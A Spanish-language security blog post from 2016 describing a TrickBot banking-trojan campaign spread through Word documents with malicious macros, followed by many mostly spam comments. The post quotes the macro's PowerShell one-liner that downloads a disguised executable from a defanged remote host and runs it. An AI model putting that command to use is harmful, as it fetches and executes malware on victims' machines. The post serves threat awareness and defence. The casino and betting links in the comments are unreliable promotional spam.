martes, 29 de noviembre de 2016

Continúan las andanzas de Trickbot

Hasta ahora encontrábamos el troyano bancario TrickBot como un binario aislado, pero abandona su comportamiento para seguir un modus operandi más habitual de éste tipo de amenazas. Además, cabe destacar que a pesar de comenzar en Australia y avanzar cruzar el charco hasta Europa, esta vez ha llegado a Canadá.

Captura del documento de Word que solicita habilitar el contenido


Esta vez, encontramos un documento de Word el cual nos pide que habilitemos la edición y el contenido, de esta manera permitiendo que se ejecuten las macros incluidas dentro del documento de Word.

Esta macro, lanza a través de Powershell la descarga de un archivo remoto .png, que a pesar de su extensión no es una imagen...

PowerShell (New-Object System.Net.WebClient).DownloadFile('hxxp://wingsbiotech.com/kufma/sdogsodngsdlk.png','C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe');Start-process 'C:\Users\xxxxx\AppData\Local\Temp\scpsis.exe';

Tras la descarga de la falsa iagen ".png", se almacena en %temp% para posteriormente ser ejecutado con una llamada a start-process


Una vez lograda la infección, comienza a conectarse a servidores remotos para descargar la configuración necesaria para su funcionamiento (tal y como vimos en la anterior una-al-día).

Esta vez, además de a los clientes de las entidades ya mencionadas se suman a la lista de afectados Santander UK y a BMO, conocido como "Bank of Montreal" (Canadá).

Recuerda que si recibes un documento por parte de un desconocido no debes abrirlo. A esto debemos añadir, que no se deben habilitar posibles ejecuciones de contenido en documentos de Office cuando el destinatario de este es desconocido, para evitar este tipo de amenazas.

Más información:

una-al-dia (07/11/2016) El troyano bancario TrickBot azota a Europa
  


Fernando Díaz

59 comentarios:

  1. Este comentario ha sido eliminado por el autor.

    ResponderEliminar
  2. Mantap articlenya

    http://maritimtours.com/tanjung-lesung/

    ResponderEliminar
  3. it's good to use video, so it's easy to understand

    ResponderEliminar
  4. nice article, nice tutorial, thank's for your sharing article

    ResponderEliminar
  5. it's good to use video, so it's easy to understand

    ResponderEliminar
  6. Terima kasih atas informasi yang menarik ini.

    ResponderEliminar
  7. Thanks for sharing such a great article with us Thanks a lot.
    ลิงค์รับทรัพย์

    ResponderEliminar
  8. Positive site, Read articles on this website, I really like your style. Thanks 카지노사이트

    ResponderEliminar
  9. Continue sharing such an excellent post. Glad that I found this, Thankyou.온라인카지노

    ResponderEliminar
  10. Continue for sharing such a excellent post here. Keep on sharing, Cheers 카지노사이트탑

    ResponderEliminar
  11. This is a tremendous post Keep up the great work. Sharing is nice keep it up 카지노사이트킹

    ResponderEliminar
  12. https://tourwisatatripmancing.blogspot.com/2023/05/tapanuli-utara-sumatera-utara.html?m=1

    ResponderEliminar
  13. https://switour.wordpress.com/2023/05/31/bukit-indah-simarjarunjung-danau-toba/

    ResponderEliminar
  14. This blog provides valuable information to us, keep it up.

    ResponderEliminar
  15. Great article. Couldn’t be write much better! Keep it up!

    ResponderEliminar
  16. Either way keep up the excellent quality writing.

    ResponderEliminar
  17. Your blogs are truly awesome. Keep it up.

    ResponderEliminar
  18. Bet on football without an agent, every match, every league, every time!: You won't miss any match. Every league you want to bet on Because we have a football betting system thatHow to apply to play football online
    does not go through an agent, which opens an online football betting table, ready for every match, every league, every time. You will experience the atmosphere of competition at every level.

    ResponderEliminar
  19. Es preocupante ver cómo TrickBot evoluciona y amplía su alcance, llegando incluso a Canadá. La advertencia sobre la apertura de documentos de fuentes desconocidas es crucial. Gracias por mantenernos informados.
    New Jersey Expunge Order of Protection

    ResponderEliminar
  20. It is stressing to perceive how TrickBot develops and extends its range, in any event, arriving at Canada. The admonition about opening records from obscure sources is vital. Gratitude for keeping us informed.
    sex crime attorney||divorce in virginia||divorce laws in new jersey

    ResponderEliminar
  21. TrickBot, a malware that uses malicious Word documents to download remote content, has changed its approach from being an isolated binario to using Word documents with malicious macros. This change is common in malware attacks aimed at evading detection and improving its distribution. Infected Word documents often request users to enable the editing and content, a trick used by attackers to enlist victims. Once the content is enabled, macros can be executed, allowing attackers to control infected systems and deploy various types of malware. Malicious actors often disguise their payloads with innocuous file extensions to evade detection. To protect against threats like TrickBot, users should exercise caution, disable macros by default, use security software, and stay informed about emerging threats and security best practices. By adopting these practices and maintaining a proactive approach to cybersecurity, individuals and organizations can reduce the risk of falling victim to malware attacks like TrickBot. personal injury lawyer virginia beach

    ResponderEliminar